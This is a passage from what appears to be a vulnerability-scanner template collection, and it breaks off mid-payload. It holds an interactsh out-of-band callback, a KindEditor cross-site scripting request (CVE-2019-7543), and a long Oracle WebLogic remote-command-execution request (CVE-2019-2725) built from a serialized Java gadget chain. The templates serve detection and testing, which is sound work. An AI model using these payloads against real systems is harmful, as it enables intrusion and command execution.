\"http://{{interactsh-url}}\">\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-7543","info":{"name":"KindEditor 4.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/kindeditor/php/demo.php","{{BaseURL}}/php/demo.php"],"body":"content1=</script><script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-2725","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\ncmd: id\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"5010\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>9</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>90</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>21</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>117</byte></void><void index=\"201\"><byte>115</byte></void><void index=\"202\"><byte>101</byte></void><void index=\"203\"><byte>83</byte></void><void index=\"204\"><byte>101</byte></void><void index=\"205\"><byte>114</byte></void><void index=\"206\"><byte>118</byte></void><void index=\"207\"><byte>105</byte></void><void index=\"208\"><byte>99</byte></void><void index=\"209\"><byte>101</byte></void><void index=\"210\"><byte>115</byte></void><void index=\"211\"><byte>77</byte></void><void index=\"212\"><byte>101</byte></void><void index=\"213\"><byte>99</byte></void><void index=\"214\"><byte>104</byte></void><void index=\"215\"><byte>97</byte></void><void index=\"216\"><byte>110</byte></void><void index=\"217\"><byte>105</byte></void><void index=\"218\"><byte>115</byte></void><void index=\"219\"><byte>109</byte></void><void index=\"220\"><byte>76</byte></void><void index=\"221\"><byte>0</byte></void><void index=\"222\"><byte>25</byte></void><void index=\"223\"><byte>95</byte></void><void index=\"224\"><byte>97</byte></void><void index=\"225\"><byte>99</byte></void><void index=\"226\"><byte>99</byte></void><void index=\"227\"><byte>101</byte></void><void index=\"228\"><byte>115</byte></void><void index=\"229\"><byte>115</byte></void><void index=\"230\"><byte>69</byte></void><void index=\"231\"><byte>120</byte></void><void index=\"232\"><byte>116</byte></void><void index=\"233\"><byte>101</byte></void><void index=\"234\"><byte>114</byte></void><void index=\"235\"><byte>110</byte></void><void index=\"236\"><byte>97</byte></void><void index=\"237\"><byte>108</byte></void><void index=\"238\"><byte>83</byte></void><void index=\"239\"><byte>116</byte></void><void index=\"240\"><byte>121</byte></void><void index=\"241\"><byte>108</byte></void><void index=\"242\"><byte>101</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>104</byte></void><void index=\"245\"><byte>101</byte></void><void index=\"246\"><byte>101</byte></void><void index=\"247\"><byte>116</byte></void><void index=\"248\"><byte>116</byte></void><void index=\"249\"><byte>0</byte></void><void index=\"250\"><byte>18</byte></void><void index=\"251\"><byte>76</byte></void><void index=\"252\"><byte>106</byte></void><void index=\"253\"><byte>97</byte></void><void index=\"254\"><byte>118</byte></void><void index=\"255\"><byte>97</byte></void><void index=\"256\"><byte>47</byte></void><void index=\"257\"><byte>108</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>110</byte></void><void index=\"260\"><byte>103</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>83</byte></void><void index=\"263\"><byte>116</byte></void><void index=\"264\"><byte>114</byte></void><void index=\"265\"><byte>105</byte></void><void index=\"266\"><byte>110</byte></void><void index=\"267\"><byte>103</byte></void><void index=\"268\"><byte>59</byte></void><void index=\"269\"><byte>76</byte></void><void index=\"270\"><byte>0</byte></void><void index=\"271\"><byte>11</byte></void><void index=\"272\"><byte>95</byte></void><void index=\"273\"><byte>97</byte></void><void index=\"274\"><byte>117</byte></void><void index=\"275\"><byte>120</byte></void><void index=\"276\"><byte>67</byte></void><void index=\"277\"><byte>108</byte></void><void index=\"278\"><byte>97</byte></void><void index=\"279\"><byte>115</byte></void><void index=\"280\"><byte>115</byte></void><void index=\"281\"><byte>101</byte></void><void index=\"282\"><byte>115</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>0</byte></void><void index=\"285\"><byte>59</byte></void><void index=\"286\"><byte>76</byte></void><void index=\"287\"><byte>99</byte></void><void index=\"288\"><byte>111</byte></void><void index=\"289\"><byte>109</byte></void><void index=\"290\"><byte>47</byte></void><void index=\"291\"><byte>115</byte></void><void index=\"292\"><byte>117</byte></void><void index=\"293\"><byte>110</byte></void><void index=\"294\"><byte>47</byte></void><void index=\"295\"><byte>111</byte></void><void index=\"296\"><byte>114</byte></void><void index=\"297\"><byte>103</byte></void><void index=\"298\"><byte>47</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>112</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>99</byte></void><void index=\"303\"><byte>104</byte></void><void index=\"304\"><byte>101</byte></void><void index=\"305\"><byte>47</byte></void><void index=\"306\"><byte>120</byte></void><void index=\"307\"><byte>97</byte></void><void index=\"308\"><byte>108</byte></void><void index=\"309\"><byte>97</byte></void><void index=\"310\"><byte>110</byte></void><void index=\"311\"><byte>47</byte></void><void index=\"312\"><byte>105</byte></void><void index=\"313\"><byte>110</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>101</byte></void><void index=\"316\"><byte>114</byte></void><void index=\"317\"><byte>110</byte></void><void index=\"318\"><byte>97</byte></void><void index=\"319\"><byte>108</byte></void><void index=\"320\"><byte>47</byte></void><void index=\"321\"><byte>120</byte></void><void index=\"322\"><byte>115</byte></void><void index=\"323\"><byte>108</byte></void><void index=\"324\"><byte>116</byte></void><void index=\"325\"><byte>99</byte></void><void index=\"326\"><byte>47</byte></void><void index=\"327\"><byte>114</byte></void><void index=\"328\"><byte>117</byte></void><void index=\"329\"><byte>110</byte></void><void index=\"330\"><byte>116</byte></void><void index=\"331\"><byte>105</byte></void><void index=\"332\"><byte>109</byte></void><void index=\"333\"><byte>101</byte></void><void index=\"334\"><byte>47</byte></void><void index=\"335\"><byte>72</byte></void><void index=\"336\"><byte>97</byte></void><void index=\"337\"><byte>115</byte></void><void index=\"338\"><byte>104</byte></void><void index=\"339\"><byte>116</byte></void><void index=\"340\"><byte>97</byte></void><void index=\"341\"><byte>98</byte></void><void index=\"342\"><byte>108</byte></void><void index=\"343\"><byte>101</byte></void><void index=\"344\"><byte>59</byte></void><void index=\"345\"><byte>91</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>10</byte></void><void index=\"348\"><byte>95</byte></void><void index=\"349\"><byte>98</byte></void><void index=\"350\"><byte>121</byte></void><void index=\"351\"><byte>116</byte></void><void index=\"352\"><byte>101</byte></void><void index=\"353\"><byte>99</byte></void><void index=\"354\"><byte>111</byte></void><void index=\"355\"><byte>100</byte></void><void index=\"356\"><byte>101</byte></void><void index=\"357\"><byte>115</byte></void><void index=\"358\"><byte>116</byte></void><void index=\"359\"><byte>0</byte></void><void index=\"360\"><byte>3</byte></void><void index=\"361\"><byte>91</byte></void><void index=\"362\"><byte>91</byte></void><void index=\"363\"><byte>66</byte></void><void index=\"364\"><byte>91</byte></void><void index=\"365\"><byte>0</byte></void><void index=\"366\"><byte>6</byte></void><void index=\"367\"><byte>95</byte></void><void index=\"368\"><byte>99</byte></void><void index=\"369\"><byte>108</byte></void><void index=\"370\"><byte>97</byte></void><void index=\"371\"><byte>115</byte></void><void index=\"372\"><byte>115</byte></void><void index=\"373\"><byte>116</byte></void><void index=\"374\"><byte>0</byte></void><void index=\"375\"><byte>18</byte></void><void index=\"376\"><byte>91</byte></void><void index=\"377\"><byte>76</byte></void><void index=\"378\"><byte>106</byte></void><void index=\"379\"><byte>97</byte></void><void index=\"380\"><byte>118</byte></void><void index=\"381\"><byte>97</byte></void><void index=\"382\"><byte>47</byte></void><void index=\"383\"><byte>108</byte></void><void index=\"384\"><byte>97</byte></void><void index=\"385\"><byte>110</byte></void><void index=\"386\"><byte>103</byte></void><void index=\"387\"><byte>47</byte></void><void index=\"388\"><byte>67</byte></void><void index=\"389\"><byte>108</byte></void><void index=\"390\"><byte>97</byte></void><void index=\"391\"><byte>115</byte></void><void index=\"392\"><byte>115</byte></void><void index=\"393\"><byte>59</byte></void><void index=\"394\"><byte>76</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>5</byte></void><void index=\"397\"><byte>95</byte></void><void index=\"398\"><byte>110</byte></void><void index=\"399\"><byte>97</byte></void><void index=\"400\"><byte>109</byte></void><void index=\"401\"><byte>101</byte></void><void index=\"402\"><byte>113</byte></void><void index=\"403\"><byte>0</byte></void><void index=\"404\"><byte>126</byte></void><void index=\"405\"><byte>0</byte></void><void index=\"406\"><byte>4</byte></void><void index=\"407\"><byte>76</byte></void><void index=\"408\"><byte>0</byte></void><void index=\"409\"><byte>17</byte></void><void index=\"410\"><byte>95</byte></void><void index=\"411\"><byte>111</byte></void><void index=\"412\"><byte>117</byte></void><void index=\"413\"><byte>116</byte></void><void index=\"414\"><byte>112</byte></void><void index=\"415\"><byte>117</byte></void><void index=\"416\"><byte>116</byte></void><void index=\"417\"><byte>80</byte></void><void index=\"418\"><byte>114</byte></void><void index=\"419\"><byte>111</byte></void><void index=\"420\"><byte>112</byte></void><void index=\"421\"><byte>101</byte></void><void index=\"422\"><byte>114</byte></void><void index=\"423\"><byte>116</byte></void><void index=\"424\"><byte>105</byte></void><void index=\"425\"><byte>101</byte></void><void index=\"426\"><byte>115</byte></void><void index=\"427\"><byte>116</byte></void><void index=\"428\"><byte>0</byte></void><void index=\"429\"><byte>22</byte></void><void index=\"430\"><byte>76</byte></void><void index=\"431\"><byte>106</byte></void><void index=\"432\"><byte>97</byte></void><void index=\"433\"><byte>118</byte></void><void index=\"434\"><byte>97</byte></void><void index=\"435\"><byte>47</byte></void><void index=\"436\"><byte>117</byte></void><void index=\"437\"><byte>116</byte></void><void index=\"438\"><byte>105</byte></void><void index=\"439\"><byte>108</byte></void><void index=\"440\"><byte>47</byte></void><void index=\"441\"><byte>80</byte></void><void index=\"442\"><byte>114</byte></void><void index=\"443\"><byte>111</byte></void><void index=\"444\"><byte>112</byte></void><void index=\"445\"><byte>101</byte></void><void index=\"446\"><byte>114</byte></void><void index=\"447\"><byte>116</byte></void><void index=\"448\"><byte>105</byte></void><void index=\"449\"><byte>101</byte></void><void index=\"450\"><byte>115</byte></void><void index=\"451\"><byte>59</byte></void><void index=\"452\"><byte>120</byte></void><void index=\"453\"><byte>112</byte></void><void index=\"454\"><byte>0</byte></void><void index=\"455\"><byte>0</byte></void><void index=\"456\"><byte>0</byte></void><void index=\"457\"><byte>0</byte></void><void index=\"458\"><byte>-1</byte></void><void index=\"459\"><byte>-1</byte></void><void index=\"460\"><byte>-1</byte></void><void index=\"461\"><byte>-1</byte></void><void index=\"462\"><byte>0</byte></void><void index=\"463\"><byte>116</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>3</byte></void><void index=\"466\"><byte>97</byte></void><void index=\"467\"><byte>108</byte></void><void index=\"468\"><byte>108</byte></void><void index=\"469\"><byte>112</byte></void><void index=\"470\"><byte>117</byte></void><void index=\"471\"><byte>114</byte></void><void index=\"472\"><byte>0</byte></void><void index=\"473\"><byte>3</byte></void><void index=\"474\"><byte>91</byte></void><void index=\"475\"><byte>91</byte></void><void index=\"476\"><byte>66</byte></void><void index=\"477\"><byte>75</byte></void><void index=\"478\"><byte>-3</byte></void><void index=\"479\"><byte>25</byte></void><void index=\"480\"><byte>21</byte></void><void index=\"481\"><byte>103</byte></void><void index=\"482\"><byte>103</byte></void><void index=\"483\"><byte>-37</byte></void><void index=\"484\"><byte>55</byte></void><void index=\"485\"><byte>2</byte></void><void index=\"486\"><byte>0</byte></void><void index=\"487\"><byte>0</byte></void><void index=\"488\"><byte>120</byte></void><void index=\"489\"><byte>112</byte></void><void index=\"490\"><byte>0</byte></void><void index=\"491\"><byte>0</byte></void><void index=\"492\"><byte>0</byte></void><void index=\"493\"><byte>2</byte></void><void index=\"494\"><byte>117</byte></void><void index=\"495\"><byte>114</byte></void><void index=\"496\"><byte>0</byte></void><void index=\"497\"><byte>2</byte></void><void index=\"498\"><byte>91</byte></void><void index=\"499\"><byte>66</byte></void><void index=\"500\"><byte>-84</byte></void><void index=\"501\"><byte>-13</byte></void><void index=\"502\"><byte>23</byte></void><void index=\"503\"><byte>-8</byte></void><void index=\"504\"><byte>6</byte></void><void index=\"505\"><byte>8</byte></void><void index=\"506\"><byte>84</byte></void><void index=\"507\"><byte>-32</byte></void><void index=\"508\"><byte>2</byte></void><void index=\"509\"><byte>0</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>120</byte></void><void index=\"512\"><byte>112</byte></void><void index=\"513\"><byte>0</byte></void><void index=\"514\"><byte>0</byte></void><void index=\"515\"><byte>14</byte></void><void index=\"516\"><byte>29</byte></void><void index=\"517\"><byte>-54</byte></void><void index=\"518\"><byte>-2</byte></void><void index=\"519\"><byte>-70</byte></void><void index=\"520\"><byte>-66</byte></void><void index=\"521\"><byte>0</byte></void><void index=\"522\"><byte>0</byte></void><void index=\"523\"><byte>0</byte></void><void index=\"524\"><byte>50</byte></void><void index=\"525\"><byte>0</byte></void><void index=\"526\"><byte>-70</byte></void><void index=\"527\"><byte>10</byte></void><void index=\"528\"><byte>0</byte></void><void index=\"529\"><byte>3</byte></void><void index=\"530\"><byte>0</byte></void><void index=\"531\"><byte>34</byte></void><void index=\"532\"><byte>7</byte></void><void index=\"533\"><byte>0</byte></void><void index=\"534\"><byte>-72</byte></void><void index=\"535\"><byte>7</byte></void><void index=\"536\"><byte>0</byte></void><void index=\"537\"><byte>37</byte></void><void index=\"538\"><byte>7</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>38</byte></void><void index=\"541\"><byte>1</byte></void><void index=\"542\"><byte>0</byte></void><void index=\"543\"><byte>16</byte></void><void index=\"544\"><byte>115</byte></void><void index=\"545\"><byte>101</byte></void><void index=\"546\"><byte>114</byte></void><void index=\"547\"><byte>105</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>108</byte></void><void index=\"550\"><byte>86</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>114</byte></void><void index=\"553\"><byte>115</byte></void><void index=\"554\"><byte>105</byte></void><void index=\"555\"><byte>111</byte></void><void index=\"556\"><byte>110</byte></void><void index=\"557\"><byte>85</byte></void><void index=\"558\"><byte>73</byte></void><void index=\"559\"><byte>68</byte></void><void index=\"560\"><byte>1</byte></void><void index=\"561\"><byte>0</byte></void><void index=\"562\"><byte>1</byte></void><void index=\"563\"><byte>74</byte></void><void index=\"564\"><byte>1</byte></void><void index=\"565\"><byte>0</byte></void><void index=\"566\"><byte>13</byte></void><void index=\"567\"><byte>67</byte></void><void index=\"568\"><byte>111</byte></void><void index=\"569\"><byte>110</byte></void><void index=\"570\"><byte>115</byte></void><void index=\"571\"><byte>116</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>110</byte></void><void index=\"574\"><byte>116</byte></void><void index=\"575\"><byte>86</byte></void><void index=\"576\"><byte>97</byte></void><void index=\"577\"><byte>108</byte></void><void index=\"578\"><byte>117</byte></void><void index=\"579\"><byte>101</byte></void><void index=\"580\"><byte>5</byte></void><void index=\"581\"><byte>-83</byte></void><void index=\"582\"><byte>32</byte></void><void index=\"583\"><byte>-109</byte></void><void index=\"584\"><byte>-13</byte></void><void index=\"585\"><byte>-111</byte></void><void index=\"586\"><byte>-35</byte></void><void index=\"587\"><byte>-17</byte></void><void index=\"588\"><byte>62</byte></void><void index=\"589\"><byte>1</byte></void><void index=\"590\"><byte>0</byte></void><void index=\"591\"><byte>6</byte></void><void index=\"592\"><byte>60</byte></void><void index=\"593\"><byte>105</byte></void><void index=\"594\"><byte>110</byte></void><void index=\"595\"><byte>105</byte></void><void index=\"596\"><byte>116</byte></void><void index=\"597\"><byte>62</byte></void><void index=\"598\"><byte>1</byte></void><void index=\"599\"><byte>0</byte></void><void index=\"600\"><byte>3</byte></void><void index=\"601\"><byte>40</byte></void><void index=\"602\"><byte>41</byte></void><void index=\"603\"><byte>86</byte></void><void index=\"604\"><byte>1</byte></void><void index=\"605\"><byte>0</byte></void><void index=\"606\"><byte>4</byte></void><void index=\"607\"><byte>67</byte></void><void index=\"608\"><byte>111</byte></void><void index=\"609\"><byte>100</byte></void><void index=\"610\"><byte>101</byte></void><void index=\"611\"><byte>1</byte></void><void index=\"612\"><byte>0</byte></void><void index=\"613\"><byte>15</byte></void><void index=\"614\"><byte>76</byte></void><void index=\"615\"><byte>105</byte></void><void index=\"616\"><byte>110</byte></void><void index=\"617\"><byte>101</byte></void><void index=\"618\"><byte>78</byte></void><void index=\"619\"><byte>117</byte></void><void index=\"620\"><byte>109</byte></void><void index=\"621\"><byte>98</byte></void><void index=\"622\"><byte>101</byte></void><void index=\"623\"><byte>114</byte></void><void index=\"624\"><byte>84</byte></void><void index=\"625\"><byte>97</byte></void><void index=\"626\"><byte>98</byte></void><void index=\"627\"><byte>108</byte></void><void index=\"628\"><byte>101</byte></void><void index=\"629\"><byte>1</byte></void><void index=\"630\"><byte>0</byte></void><void index=\"631\"><byte>18</byte></void><void index=\"632\"><byte>76</byte></void><void index=\"633\"><byte>111</byte></void><void index=\"634\"><byte>99</byte></void><void index=\"635\"><byte>97</byte></void><void index=\"636\"><byte>108</byte></void><void index=\"637\"><byte>86</byte></void><void index=\"638\"><byte>97</byte></void><void index=\"639\"><byte>114</byte></void><void index=\"640\"><byte>105</byte></void><void index=\"641\"><byte>97</byte></void><void index=\"642\"><byte>98</byte></void><void index=\"643\"><byte>108</byte></void><void index=\"644\"><byte>101</byte></void><void index=\"645\"><byte>84</byte></void><void index=\"646\"><byte>97</byte></void><void index=\"647\"><byte>98</byte></void><void index=\"648\"><byte>108</byte></void><void index=\"649\"><byte>101</byte></void><void index=\"650\"><byte>1</byte></void><void index=\"651\"><byte>0</byte></void><void index=\"652\"><byte>4</byte></void><void index=\"653\"><byte>116</byte></void><void index=\"654\"><byte>104</byte></void><void index=\"655\"><byte>105</byte></void><void index=\"656\"><byte>115</byte></void><void index=\"657\"><byte>1</byte></void><void index=\"658\"><byte>0</byte></void><void index=\"659\"><byte>19</byte></void><void index=\"660\"><byte>83</byte></void><void index=\"661\"><byte>116</byte></void><void index=\"662\"><byte>117</byte></void><void index=\"663\"><byte>98</byte></void><void index=\"664\"><byte>84</byte></void><void index=\"665\"><byte>114</byte></void><void index=\"666\"><byte>97</byte></void><void index=\"667\"><byte>110</byte></void><void index=\"668\"><byte>115</byte></void><void index=\"669\"><byte>108</byte></void><void index=\"670\"><byte>101</byte></void><void index=\"671\"><byte>116</byte></void><void index=\"672\"><byte>80</byte></void><void index=\"673\"><byte>97</byte></void><void index=\"674\"><byte>121</byte></void><void index=\"675\"><byte>108</byte></void><void index=\"676\"><byte>111</byte></void><void index=\"677\"><byte>97</byte></void><void index=\"678\"><byte>100</byte></void><void index=\"679\"><byte>1</byte></void><void index=\"680\"><byte>0</byte></void><void index=\"681\"><byte>12</byte></void><void index=\"682\"><byte>73</byte></void><void index=\"683\"><byte>110</byte></void><void index=\"684\"><byte>110</byte></void><void index=\"685\"><byte>101</byte></void><void index=\"686\"><byte>114</byte></void><void index=\"687\"><byte>67</byte></void><void index=\"688\"><byte>108</byte></void><void index=\"689\"><byte>97</byte></void><void index=\"690\"><byte>115</byte></void><void index=\"691\"><byte>115</byte></void><void index=\"692\"><byte>101</byte></void><void index=\"693\"><byte>115</byte></void><void index=\"694\"><byte>1</byte></void><void index=\"695\"><byte>0</byte></void><void index=\"696\"><byte>53</byte></void><void index=\"697\"><byte>76</byte></void><void index=\"698\"><byte>121</byte></void><void index=\"699\"><byte>115</byte></void><void index=\"700\"><byte>111</byte></void><void index=\"701\"><byte>115</byte></void><void index=\"702\"><byte>101</byte></void><void index=\"703\"><byte>114</byte></void><void index=\"704\"><byte>105</byte></void><void index=\"705\"><byte>97</byte></void><void index=\"706\"><byte>108</byte></void><void index=\"707\"><byte>47</byte></void><void index=\"708\"><byte>112</byte></void><void index=\"709\"><byte>97</byte></void><void index=\"710\"><byte>121</byte></void><void index=\"711\"><byte>108</byte></void><void index=\"712\"><byte>111</byte></void><void index=\"713\"><byte>97</byte></void><void index=\"714\"><byte>100</byte></void><void index=\"715\"><byte>115</byte></void><void index=\"716\"><byte>47</byte></void><void index=\"717\"><byte>117</byte></void><void index=\"718\"><byte>116</byte></void><void index=\"719\"><byte>105</byte></void><void index=\"720\"><byte>108</byte></void><void index=\"721\"><byte>47</byte></void><void index=\"722\"><byte>71</byte></void><void index=\"723\"><byte>97</byte></void><void index=\"724\"><byte>100</byte></void><void index=\"725\"><byte>103</byte></void><void index=\"726\"><byte>101</byte></void><void index=\"727\"><byte>116</byte></void><void index=\"728\"><byte>115</byte></void><void index=\"729\"><byte>36</byte></void><void index=\"730\"><byte>83</byte></void><void index=\"731\"><byte>116</byte></void><void index=\"732\"><byte>117</byte></void><void index=\"733\"><byte>98</byte></void><void index=\"734\"><byte>84</byte></void><void index=\"735\"><byte>114</byte></void><void index=\"736\"><byte>97</byte></void><void index=\"737\"><byte>110</byte></void><void index=\"738\"><byte>115</byte></void><void index=\"739\"><byte>108</byte></void><void index=\"740\"><byte>101</byte></void><void index=\"741\"><byte>116</byte></void><void index=\"742\"><byte>80</byte></void><void index=\"743\"><byte>97</byte></void><void index=\"744\"><byte>121</byte></void><void index=\"745\"><byte>108</byte></void><void 